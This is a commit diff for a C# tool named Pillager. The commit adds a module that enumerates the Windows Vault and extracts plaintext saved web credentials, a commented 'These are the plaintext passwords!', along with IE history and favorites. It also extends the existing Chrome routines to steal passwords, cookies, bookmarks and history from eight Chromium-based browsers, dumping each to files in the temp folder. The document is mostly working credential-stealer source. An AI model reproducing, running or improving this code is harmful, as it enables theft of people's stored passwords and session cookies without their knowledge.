update
This commit is contained in:
parent
e58da0f648
commit
3288f9878c
|
@ -1,11 +1,11 @@
|
|||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Security.Cryptography;
|
||||
using System.Text;
|
||||
using Pillager.Helper;
|
||||
|
||||
namespace Pillager
|
||||
namespace Pillager.Browsers
|
||||
{
|
||||
public class Chrome
|
||||
{
|
||||
|
@ -26,7 +26,7 @@ namespace Pillager
|
|||
{
|
||||
string filePath = Path.Combine(Directory.GetParent(BrowserPath).FullName, "Local State");
|
||||
byte[] masterKey = new byte[] { };
|
||||
if (File.Exists(filePath) == false)
|
||||
if (!File.Exists(filePath))
|
||||
return null;
|
||||
var pattern = new System.Text.RegularExpressions.Regex("\"encrypted_key\":\"(.*?)\"", System.Text.RegularExpressions.RegexOptions.Compiled).Matches(File.ReadAllText(filePath));
|
||||
foreach (System.Text.RegularExpressions.Match prof in pattern)
|
||||
|
@ -71,7 +71,7 @@ namespace Pillager
|
|||
return decryptedData;
|
||||
}
|
||||
|
||||
internal string Chrome_passwords()
|
||||
public string Chrome_passwords()
|
||||
{
|
||||
StringBuilder passwords = new StringBuilder();
|
||||
string loginDataPath = Path.Combine(BrowserPath, "Login Data");
|
||||
|
@ -141,8 +141,6 @@ namespace Pillager
|
|||
return history.ToString(); ;
|
||||
}
|
||||
|
||||
|
||||
|
||||
public string Chrome_cookies()
|
||||
{
|
||||
StringBuilder cookies = new StringBuilder();
|
||||
|
@ -177,7 +175,6 @@ namespace Pillager
|
|||
return cookies.ToString();
|
||||
}
|
||||
|
||||
|
||||
public string Chrome_books()
|
||||
{
|
||||
StringBuilder stringBuilder = new StringBuilder();
|
||||
|
@ -188,5 +185,23 @@ namespace Pillager
|
|||
}
|
||||
return stringBuilder.ToString();
|
||||
}
|
||||
|
||||
public void Save(string path)
|
||||
{
|
||||
if (MasterKey==null)
|
||||
{
|
||||
return;
|
||||
}
|
||||
string savepath = Path.Combine(path, BrowserName);
|
||||
Directory.CreateDirectory(savepath);
|
||||
string cookies = Chrome_cookies();
|
||||
string passwords = Chrome_passwords();
|
||||
string books = Chrome_books();
|
||||
string history = Chrome_history();
|
||||
File.WriteAllText(Path.Combine(savepath, BrowserName + "_cookies.txt"), cookies);
|
||||
File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords);
|
||||
File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books);
|
||||
File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history);
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,278 @@
|
|||
using Microsoft.Win32;
|
||||
using Pillager.Helper;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Text.RegularExpressions;
|
||||
|
||||
namespace Pillager.Browsers
|
||||
{
|
||||
public static class IE
|
||||
{
|
||||
public static string BrowserName = "IE";
|
||||
public static string IE_passwords()
|
||||
{
|
||||
StringBuilder sb = new StringBuilder();
|
||||
var OSVersion = Environment.OSVersion.Version;
|
||||
var OSMajor = OSVersion.Major;
|
||||
var OSMinor = OSVersion.Minor;
|
||||
|
||||
Type VAULT_ITEM;
|
||||
|
||||
if (OSMajor >= 6 && OSMinor >= 2)
|
||||
{
|
||||
VAULT_ITEM = typeof(VaultCli.VAULT_ITEM_WIN8);
|
||||
}
|
||||
else
|
||||
{
|
||||
VAULT_ITEM = typeof(VaultCli.VAULT_ITEM_WIN7);
|
||||
}
|
||||
|
||||
/* Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct */
|
||||
object GetVaultElementValue(IntPtr vaultElementPtr)
|
||||
{
|
||||
object results;
|
||||
object partialElement = System.Runtime.InteropServices.Marshal.PtrToStructure(vaultElementPtr, typeof(VaultCli.VAULT_ITEM_ELEMENT));
|
||||
FieldInfo partialElementInfo = partialElement.GetType().GetField("Type");
|
||||
var partialElementType = partialElementInfo.GetValue(partialElement);
|
||||
|
||||
IntPtr elementPtr = (IntPtr)(vaultElementPtr.ToInt64() + 16);
|
||||
switch ((int)partialElementType)
|
||||
{
|
||||
case 7: // VAULT_ELEMENT_TYPE == String; These are the plaintext passwords!
|
||||
IntPtr StringPtr = System.Runtime.InteropServices.Marshal.ReadIntPtr(elementPtr);
|
||||
results = System.Runtime.InteropServices.Marshal.PtrToStringUni(StringPtr);
|
||||
break;
|
||||
case 0: // VAULT_ELEMENT_TYPE == bool
|
||||
results = System.Runtime.InteropServices.Marshal.ReadByte(elementPtr);
|
||||
results = (bool)results;
|
||||
break;
|
||||
case 1: // VAULT_ELEMENT_TYPE == Short
|
||||
results = System.Runtime.InteropServices.Marshal.ReadInt16(elementPtr);
|
||||
break;
|
||||
case 2: // VAULT_ELEMENT_TYPE == Unsigned Short
|
||||
results = System.Runtime.InteropServices.Marshal.ReadInt16(elementPtr);
|
||||
break;
|
||||
case 3: // VAULT_ELEMENT_TYPE == Int
|
||||
results = System.Runtime.InteropServices.Marshal.ReadInt32(elementPtr);
|
||||
break;
|
||||
case 4: // VAULT_ELEMENT_TYPE == Unsigned Int
|
||||
results = System.Runtime.InteropServices.Marshal.ReadInt32(elementPtr);
|
||||
break;
|
||||
case 5: // VAULT_ELEMENT_TYPE == Double
|
||||
results = System.Runtime.InteropServices.Marshal.PtrToStructure(elementPtr, typeof(Double));
|
||||
break;
|
||||
case 6: // VAULT_ELEMENT_TYPE == GUID
|
||||
results = System.Runtime.InteropServices.Marshal.PtrToStructure(elementPtr, typeof(Guid));
|
||||
break;
|
||||
case 12: // VAULT_ELEMENT_TYPE == Sid
|
||||
IntPtr sidPtr = System.Runtime.InteropServices.Marshal.ReadIntPtr(elementPtr);
|
||||
var sidObject = new System.Security.Principal.SecurityIdentifier(sidPtr);
|
||||
results = sidObject.Value;
|
||||
break;
|
||||
default:
|
||||
/* Several VAULT_ELEMENT_TYPES are currently unimplemented according to
|
||||
* Lord Graeber. Thus we do not implement them. */
|
||||
results = null;
|
||||
break;
|
||||
}
|
||||
return results;
|
||||
}
|
||||
/* End helper function */
|
||||
|
||||
Int32 vaultCount = 0;
|
||||
IntPtr vaultGuidPtr = IntPtr.Zero;
|
||||
var result = VaultCli.VaultEnumerateVaults(0, ref vaultCount, ref vaultGuidPtr);
|
||||
|
||||
//var result = CallVaultEnumerateVaults(VaultEnum, 0, ref vaultCount, ref vaultGuidPtr);
|
||||
|
||||
if ((int)result != 0)
|
||||
{
|
||||
throw new Exception("[ERROR] Unable to enumerate vaults. Error (0x" + result.ToString() + ")");
|
||||
}
|
||||
|
||||
// Create dictionary to translate Guids to human readable elements
|
||||
IntPtr guidAddress = vaultGuidPtr;
|
||||
Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>();
|
||||
vaultSchema.Add(new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note");
|
||||
vaultSchema.Add(new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential");
|
||||
vaultSchema.Add(new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector");
|
||||
vaultSchema.Add(new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials");
|
||||
vaultSchema.Add(new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials");
|
||||
vaultSchema.Add(new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential");
|
||||
vaultSchema.Add(new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential");
|
||||
vaultSchema.Add(new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential");
|
||||
vaultSchema.Add(new Guid("00000000-0000-0000-0000-000000000000"), null);
|
||||
|
||||
for (int i = 0; i < vaultCount; i++)
|
||||
{
|
||||
// Open vault block
|
||||
object vaultGuidString = System.Runtime.InteropServices.Marshal.PtrToStructure(guidAddress, typeof(Guid));
|
||||
Guid vaultGuid = new Guid(vaultGuidString.ToString());
|
||||
guidAddress = (IntPtr)(guidAddress.ToInt64() + System.Runtime.InteropServices.Marshal.SizeOf(typeof(Guid)));
|
||||
IntPtr vaultHandle = IntPtr.Zero;
|
||||
string vaultType;
|
||||
if (vaultSchema.ContainsKey(vaultGuid))
|
||||
{
|
||||
vaultType = vaultSchema[vaultGuid];
|
||||
}
|
||||
else
|
||||
{
|
||||
vaultType = vaultGuid.ToString();
|
||||
}
|
||||
result = VaultCli.VaultOpenVault(ref vaultGuid, (UInt32)0, ref vaultHandle);
|
||||
if (result != 0)
|
||||
{
|
||||
throw new Exception("Unable to open the following vault: " + vaultType + ". Error: 0x" + result.ToString());
|
||||
}
|
||||
// Vault opened successfully! Continue.
|
||||
|
||||
// Fetch all items within Vault
|
||||
int vaultItemCount = 0;
|
||||
IntPtr vaultItemPtr = IntPtr.Zero;
|
||||
result = VaultCli.VaultEnumerateItems(vaultHandle, 512, ref vaultItemCount, ref vaultItemPtr);
|
||||
if (result != 0)
|
||||
{
|
||||
throw new Exception("[ERROR] Unable to enumerate vault items from the following vault: " + vaultType + ". Error 0x" + result.ToString());
|
||||
}
|
||||
var structAddress = vaultItemPtr;
|
||||
if (vaultItemCount > 0)
|
||||
{
|
||||
// For each vault item...
|
||||
for (int j = 1; j <= vaultItemCount; j++)
|
||||
{
|
||||
// Begin fetching vault item...
|
||||
var currentItem = System.Runtime.InteropServices.Marshal.PtrToStructure(structAddress, VAULT_ITEM);
|
||||
structAddress = (IntPtr)(structAddress.ToInt64() + System.Runtime.InteropServices.Marshal.SizeOf(VAULT_ITEM));
|
||||
|
||||
IntPtr passwordVaultItem = IntPtr.Zero;
|
||||
// Field Info retrieval
|
||||
FieldInfo schemaIdInfo = currentItem.GetType().GetField("SchemaId");
|
||||
Guid schemaId = new Guid(schemaIdInfo.GetValue(currentItem).ToString());
|
||||
FieldInfo pResourceElementInfo = currentItem.GetType().GetField("pResourceElement");
|
||||
IntPtr pResourceElement = (IntPtr)pResourceElementInfo.GetValue(currentItem);
|
||||
FieldInfo pIdentityElementInfo = currentItem.GetType().GetField("pIdentityElement");
|
||||
IntPtr pIdentityElement = (IntPtr)pIdentityElementInfo.GetValue(currentItem);
|
||||
FieldInfo dateTimeInfo = currentItem.GetType().GetField("LastModified");
|
||||
UInt64 lastModified = (UInt64)dateTimeInfo.GetValue(currentItem);
|
||||
|
||||
object[] vaultGetItemArgs;
|
||||
IntPtr pPackageSid = IntPtr.Zero;
|
||||
if (OSMajor >= 6 && OSMinor >= 2)
|
||||
{
|
||||
// Newer versions have package sid
|
||||
FieldInfo pPackageSidInfo = currentItem.GetType().GetField("pPackageSid");
|
||||
pPackageSid = (IntPtr)pPackageSidInfo.GetValue(currentItem);
|
||||
result = VaultCli.VaultGetItem_WIN8(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, pPackageSid, IntPtr.Zero, 0, ref passwordVaultItem);
|
||||
}
|
||||
else
|
||||
{
|
||||
result = VaultCli.VaultGetItem_WIN7(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, IntPtr.Zero, 0, ref passwordVaultItem);
|
||||
}
|
||||
|
||||
if (result != 0)
|
||||
{
|
||||
throw new Exception("Error occured while retrieving vault item. Error: 0x" + result.ToString());
|
||||
}
|
||||
object passwordItem = System.Runtime.InteropServices.Marshal.PtrToStructure(passwordVaultItem, VAULT_ITEM);
|
||||
FieldInfo pAuthenticatorElementInfo = passwordItem.GetType().GetField("pAuthenticatorElement");
|
||||
IntPtr pAuthenticatorElement = (IntPtr)pAuthenticatorElementInfo.GetValue(passwordItem);
|
||||
// Fetch the credential from the authenticator element
|
||||
object cred = GetVaultElementValue(pAuthenticatorElement);
|
||||
object packageSid = null;
|
||||
if (pPackageSid != IntPtr.Zero && pPackageSid != null)
|
||||
{
|
||||
packageSid = GetVaultElementValue(pPackageSid);
|
||||
}
|
||||
if (cred != null) // Indicates successful fetch
|
||||
{
|
||||
sb.AppendLine("\tVault Type : {"+ vaultType + "}");
|
||||
object resource = GetVaultElementValue(pResourceElement);
|
||||
if (resource != null)
|
||||
{
|
||||
sb.AppendLine("\tVault Type : {" + resource + "}");
|
||||
}
|
||||
object identity = GetVaultElementValue(pIdentityElement);
|
||||
if (identity != null)
|
||||
{
|
||||
sb.AppendLine("\tVault Type : {" + identity + "}");
|
||||
}
|
||||
if (packageSid != null)
|
||||
{
|
||||
sb.AppendLine("\tVault Type : {" + packageSid + "}");
|
||||
}
|
||||
sb.AppendLine("\tVault Type : {" + cred + "}");
|
||||
// Stupid datetime
|
||||
sb.AppendLine("\tLastModified : {"+ DateTime.FromFileTimeUtc((long)lastModified) + "}");
|
||||
sb.AppendLine();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return sb.ToString();
|
||||
}
|
||||
|
||||
public static string IE_history()
|
||||
{
|
||||
StringBuilder sb = new StringBuilder();
|
||||
RegistryKey myreg = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Explorer\\TypedURLs");
|
||||
string[] urls = new string[26];
|
||||
|
||||
for (int i = 1; i < 26; i++)
|
||||
{
|
||||
try
|
||||
{
|
||||
urls[i] = myreg.GetValue("url" + i.ToString()).ToString();
|
||||
}
|
||||
catch { }
|
||||
}
|
||||
foreach (string url in urls)
|
||||
{
|
||||
if (url != null)
|
||||
{
|
||||
sb.AppendLine(url);
|
||||
}
|
||||
}
|
||||
return sb.ToString();
|
||||
}
|
||||
|
||||
public static string IE_books()
|
||||
{
|
||||
StringBuilder sb = new StringBuilder();
|
||||
string book_path = Environment.GetFolderPath(Environment.SpecialFolder.Favorites);
|
||||
|
||||
string[] files = Directory.GetFiles(book_path, "*.url", SearchOption.AllDirectories);
|
||||
|
||||
foreach (string url_file_path in files)
|
||||
{
|
||||
if (File.Exists(url_file_path) == true)
|
||||
{
|
||||
string booktext = File.ReadAllText(url_file_path);
|
||||
Match match = Regex.Match(booktext, @"URL=(.*?)\n");
|
||||
sb.AppendLine($"\t{url_file_path}");
|
||||
sb.AppendLine($"\t\t{match.Value}");
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
return sb.ToString();
|
||||
}
|
||||
|
||||
public static void Save(string path)
|
||||
{
|
||||
string savepath = Path.Combine(path, BrowserName);
|
||||
Directory.CreateDirectory(savepath);
|
||||
string passwords = IE_passwords();
|
||||
string books = IE_books();
|
||||
string history = IE_history();
|
||||
File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords);
|
||||
File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books);
|
||||
File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history);
|
||||
}
|
||||
}
|
||||
}
|
|
@ -1,11 +1,9 @@
|
|||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Cryptography;
|
||||
using System.Text;
|
||||
|
||||
namespace Pillager
|
||||
namespace Pillager.Helper
|
||||
{
|
||||
//AES GCM from https://github.com/dvsekhvalnov/jose-jwt
|
||||
internal class AesGcm
|
|
@ -1,10 +1,7 @@
|
|||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
|
||||
namespace Pillager
|
||||
namespace Pillager.Helper
|
||||
{
|
||||
public static class BCrypt
|
||||
{
|
|
@ -1,11 +1,10 @@
|
|||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
|
||||
namespace Pillager
|
||||
namespace Pillager.Helper
|
||||
{
|
||||
public class SQLiteHandler
|
||||
{
|
|
@ -0,0 +1,100 @@
|
|||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
|
||||
namespace Pillager.Helper
|
||||
{
|
||||
public static class VaultCli
|
||||
{
|
||||
public enum VAULT_ELEMENT_TYPE : Int32
|
||||
{
|
||||
Undefined = -1,
|
||||
Boolean = 0,
|
||||
Short = 1,
|
||||
UnsignedShort = 2,
|
||||
Int = 3,
|
||||
UnsignedInt = 4,
|
||||
Double = 5,
|
||||
Guid = 6,
|
||||
String = 7,
|
||||
ByteArray = 8,
|
||||
TimeStamp = 9,
|
||||
ProtectedArray = 10,
|
||||
Attribute = 11,
|
||||
Sid = 12,
|
||||
Last = 13
|
||||
}
|
||||
|
||||
public enum VAULT_SCHEMA_ELEMENT_ID : Int32
|
||||
{
|
||||
Illegal = 0,
|
||||
Resource = 1,
|
||||
Identity = 2,
|
||||
Authenticator = 3,
|
||||
Tag = 4,
|
||||
PackageSid = 5,
|
||||
AppStart = 100,
|
||||
AppEnd = 10000
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
|
||||
public struct VAULT_ITEM_WIN8
|
||||
{
|
||||
public Guid SchemaId;
|
||||
public IntPtr pszCredentialFriendlyName;
|
||||
public IntPtr pResourceElement;
|
||||
public IntPtr pIdentityElement;
|
||||
public IntPtr pAuthenticatorElement;
|
||||
public IntPtr pPackageSid;
|
||||
public UInt64 LastModified;
|
||||
public UInt32 dwFlags;
|
||||
public UInt32 dwPropertiesCount;
|
||||
public IntPtr pPropertyElements;
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
|
||||
public struct VAULT_ITEM_WIN7
|
||||
{
|
||||
public Guid SchemaId;
|
||||
public IntPtr pszCredentialFriendlyName;
|
||||
public IntPtr pResourceElement;
|
||||
public IntPtr pIdentityElement;
|
||||
public IntPtr pAuthenticatorElement;
|
||||
public UInt64 LastModified;
|
||||
public UInt32 dwFlags;
|
||||
public UInt32 dwPropertiesCount;
|
||||
public IntPtr pPropertyElements;
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Explicit, CharSet = CharSet.Ansi)]
|
||||
public struct VAULT_ITEM_ELEMENT
|
||||
{
|
||||
[FieldOffset(0)] public VAULT_SCHEMA_ELEMENT_ID SchemaElementId;
|
||||
[FieldOffset(8)] public VAULT_ELEMENT_TYPE Type;
|
||||
}
|
||||
|
||||
[DllImport("vaultcli.dll")]
|
||||
public extern static Int32 VaultOpenVault(ref Guid vaultGuid, UInt32 offset, ref IntPtr vaultHandle);
|
||||
|
||||
[DllImport("vaultcli.dll")]
|
||||
public extern static Int32 VaultCloseVault(ref IntPtr vaultHandle);
|
||||
|
||||
[DllImport("vaultcli.dll")]
|
||||
public extern static Int32 VaultFree(ref IntPtr vaultHandle);
|
||||
|
||||
[DllImport("vaultcli.dll")]
|
||||
public extern static Int32 VaultEnumerateVaults(Int32 offset, ref Int32 vaultCount, ref IntPtr vaultGuid);
|
||||
|
||||
[DllImport("vaultcli.dll")]
|
||||
public extern static Int32 VaultEnumerateItems(IntPtr vaultHandle, Int32 chunkSize, ref Int32 vaultItemCount, ref IntPtr vaultItem);
|
||||
|
||||
[DllImport("vaultcli.dll", EntryPoint = "VaultGetItem")]
|
||||
public extern static Int32 VaultGetItem_WIN8(IntPtr vaultHandle, ref Guid schemaId, IntPtr pResourceElement, IntPtr pIdentityElement, IntPtr pPackageSid, IntPtr zero, Int32 arg6, ref IntPtr passwordVaultPtr);
|
||||
|
||||
[DllImport("vaultcli.dll", EntryPoint = "VaultGetItem")]
|
||||
public extern static Int32 VaultGetItem_WIN7(IntPtr vaultHandle, ref Guid schemaId, IntPtr pResourceElement, IntPtr pIdentityElement, IntPtr zero, Int32 arg5, ref IntPtr passwordVaultPtr);
|
||||
|
||||
}
|
||||
}
|
|
@ -41,12 +41,14 @@
|
|||
<Reference Include="System.Xml" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Compile Include="AesGcm.cs" />
|
||||
<Compile Include="BCrypt.cs" />
|
||||
<Compile Include="Chrome.cs" />
|
||||
<Compile Include="Browsers\IE.cs" />
|
||||
<Compile Include="Helper\AesGcm.cs" />
|
||||
<Compile Include="Helper\BCrypt.cs" />
|
||||
<Compile Include="Browsers\Chrome.cs" />
|
||||
<Compile Include="Helper\VaultCli.cs" />
|
||||
<Compile Include="Program.cs" />
|
||||
<Compile Include="Properties\AssemblyInfo.cs" />
|
||||
<Compile Include="SQLiteHandler.cs" />
|
||||
<Compile Include="Helper\SQLiteHandler.cs" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
|
||||
</Project>
|
|
@ -1,8 +1,8 @@
|
|||
using System;
|
||||
using System.Collections;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using Pillager.Browsers;
|
||||
|
||||
namespace Pillager
|
||||
{
|
||||
|
@ -11,18 +11,32 @@ namespace Pillager
|
|||
static void Main(string[] args)
|
||||
{
|
||||
string savepath = Path.GetTempPath();
|
||||
string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
|
||||
"Google\\Chrome\\User Data\\Default");
|
||||
Chrome chrome = new Chrome("Chrome", chromepath);
|
||||
string cookies = chrome.Chrome_cookies();
|
||||
string passwords = chrome.Chrome_passwords();
|
||||
string books = chrome.Chrome_books();
|
||||
string history = chrome.Chrome_history();
|
||||
File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_cookies.txt"), cookies);
|
||||
File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_passwords.txt"), passwords);
|
||||
File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_books.txt"), books);
|
||||
File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_history.txt"), history);
|
||||
Console.WriteLine("Files wrote to " + savepath + chrome.BrowserName + "_*.txt");
|
||||
|
||||
//IE
|
||||
IE.Save(savepath);
|
||||
Console.WriteLine("Files wrote to " + savepath + IE.BrowserName + "\\");
|
||||
|
||||
//Chrome
|
||||
List<List<string>> browserOnChromium = new List<List<string>>()
|
||||
{
|
||||
new List<string>() { "Chrome", "Google\\Chrome\\User Data\\Default" } ,
|
||||
new List<string>() { "Chrome Beta", "Google\\Chrome Beta\\User Data\\Default" } ,
|
||||
new List<string>() { "Chromium", "Chromium\\User Data\\Default" } ,
|
||||
new List<string>() { "Edge", "Microsoft\\Edge\\User Data\\Default" } ,
|
||||
new List<string>() { "Brave-Browse", "BraveSoftware\\Brave-Browser\\User Data\\Default" } ,
|
||||
new List<string>() { "QQBrowser", "Tencent\\QQBrowser\\User Data\\Default" } ,
|
||||
new List<string>() { "Vivaldi", "Vivaldi\\User Data\\Default" } ,
|
||||
new List<string>() { "CocCoc", "CocCoc\\Browser\\User Data\\Default" }
|
||||
//new List<string>() { "", "" } ,
|
||||
};
|
||||
foreach (List<string> browser in browserOnChromium)
|
||||
{
|
||||
string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
|
||||
browser[1]);
|
||||
Chrome chrome = new Chrome(browser[0], chromepath);
|
||||
chrome.Save(savepath);
|
||||
Console.WriteLine("Files wrote to " + savepath + chrome.BrowserName + "\\");
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue